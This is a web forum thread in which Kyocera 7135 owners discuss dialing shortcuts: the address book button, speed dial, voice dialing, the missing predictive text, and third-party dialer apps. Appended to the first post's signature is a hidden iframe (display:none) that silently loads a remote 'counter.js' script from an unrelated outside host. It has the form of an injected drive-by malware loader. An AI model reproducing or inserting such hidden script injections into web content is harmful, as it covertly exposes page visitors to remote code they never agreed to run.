+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

wanted: one button shortcut for dialing

With the 6035, I could hit the search button and hold it down, then use the jog button while driving and find phone numbers easily.

With the 7135, it seems you need to:

1. open the phone (or if already open, make sure it is in phone mode.)

Then, in the phone app:

2. scroll down to "phone book"

3. Hit the OK button

4. Get to the phone book

5. Start hitting numbers that transliterate into letters

This is harder to do than the 6035 procedure, requires being in the Palm mode, and takes my attention away from driving.

Anyone know how to use this phone to dial while on the go, as easily as the 6035?

Thanks!

--Richard<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Try using speed dial or go to the address book first. Then when you are on the name you want to call you just hit the green phone and your off and running or you tap the number.

How about voicedial. That would be safest for driving.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    How about voicedial. That would be safest for driving.
    Voice dialing is a feature of the phone, right? So how does that work? I saw on VZ's website that they sell this feature, and I'm assuming that what they're selling will work with any phone. How is that different from the built-in feature of the phone? How does is recognize the name that you're speaking? Do you teach it names or pre-record them?

This is something I've been wondering about for a while now.
    Sorry, but I no longer make 7135 headset adapters.

I'm talking about the built-in feature on the phone. But yes for an additional $5 you can get the Verizon service. But why when you already have it on your phone?
    ~'kito
    pdaPhoneHome Moderator

I wouldn't. Just wanted to make sure that my understanding was correct. So, do you know how the phone's voice dialing works? Or will I have to wait 'till Wednesday and figure it out myself?

The only thing different from the 6035 to the 7135 is the flip on this. FOr the 7135:

1) open the flip
    2) press the address book button
    3) scroll to the name you want (press the keypad to jump to a letter)
    4) press send on the name to dial the default number or
    5) press ok to view all the contact's numbers and scroll to the one you want and hit send

It's no different. In the 6035 you had to scroll to the "Phone Book" and hit ok first. On the 7135, you just hit the address book button.

shortcut for dialing

Try Finger Dial 3.0 at http://www.fingerclick.com/
    It's the best utility for phone dialing I have used on my 6035.
    Not sure if it works on 7135. Anybody using it?

In addition to HotSync's reply - when you pick the address book, and you start to use the keypade to enter letters, the predictive text works great. I've got 4,000 contacts and get to the one I want using one hand very quickly while driving. I don't recommend this if you're driving in Paris, Athens or Boston, though!

voice dialing

is there a way to use voice dialing without actually touching the phone keypad?

Re: shortcut for dialing

Originally posted by gcejr
    Try Finger Dial 3.0 at http://www.fingerclick.com/
    It's the best utility for phone dialing I have used on my 6035.
    Not sure if it works on 7135. Anybody using it?
    I downloaded the trial version and it crashed my 7135. You should contact them to see when they're coming with a 7135-compliant version.

ZZ
    Sorry about that. That's why I said I was using it on my 6035. Took your suggestion tho and Emailed this thread to the people @ Fingerclick. I'll let you know if they respond. Hope they fix the problem as I will surely want to use it on my Verizon (Can you hear me now?) 7135.

Originally posted by ZZLeGrand
    In addition to HotSync's reply - when you pick the address book, and you start to use the keypade to enter letters, the predictive text works great.
    At the risk of sounding really dumb (who cares?) how do you get that to work?

If I want "JONES" , I have to press "5" once, "6" three times, wait, "6" two more times, "3" two times, and "7" four times.

On my T9 phones, I could just press "5", "6","6", "3", "7" and "JONES" would have probably come up after the 2nd "6".

Is there an option or preference I need to set?

It is way easier to one hand dial on the 7135 than the 6035

Re: Re: shortcut for dialing

I downloaded the trial version and it crashed my 7135. You should contact them to see when they're coming with a 7135-compliant version.
    FingerDial is working fine on my 7135...I think I've decided this is the phone application for me! The only hacks I'm running is the MiddleCase hack.

Doesn't the 7135 have a speed-dial feature like my StarTac? Where each of the buttons 1-9 can be assigned to a specific contact, then when you press and hold that number it dials that person. Since there are really only 6-7 people I call that regularly this has worked great for me. Voice dialing should be even easier though, you won't even have to take the phone off your hip!

Re: Re: shortcut for dialing

Hi,

I have also had reports of the 7135 crushing with my TAKEphONE dialing application. I traced it down to some problem with the SDK Kyocera supplied for the 6035 - they are yet to release an update for the 7135.

I have a fix for this in my new TAKEphONE version. If anyone is interested - email me at shimon@shsh.com
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Originally posted by coolcat
    Doesn't the 7135 have a speed-dial feature like my StarTac? Where each of the buttons 1-9 can be assigned to a specific contact, then when you press and hold that number it dials that person.
    Yes. You have 99 speed dial locations.

Will someone please give me the 411 on predictive text entry? I've search the site and folks claim it is there but the 7135 docs don't. The Kyocera rep also told me that it isn't there. I'm using Textplus as a good substitute but I'd rather use predictive text or T9.

Originally posted by Beryl
    Yes. You have 99 speed dial locations.

Will someone please give me the 411 on predictive text entry? I've search the site and folks claim it is there but the 7135 docs don't. The Kyocera rep also told me that it isn't there. I'm using Textplus as a good substitute but I'd rather use predictive text or T9.
    It doesn't have predictive text entry. Apparently it failed during Beta. Some people have referred to spelling with the number buttons as predictive text, but they were incorrect. It does it the "old fashioned" way. i.e. To get a C, you hit the 2 button three times.

Alan

Originally posted by alanb
    It doesn't have predictive text entry. Apparently it failed during Beta.
    **Whew**! I was wondering if I was the only one who wasn't invited to the party .

Textplus does work nicely though -- not for bringing up names in the addressbook but for other data entry jobs on this device.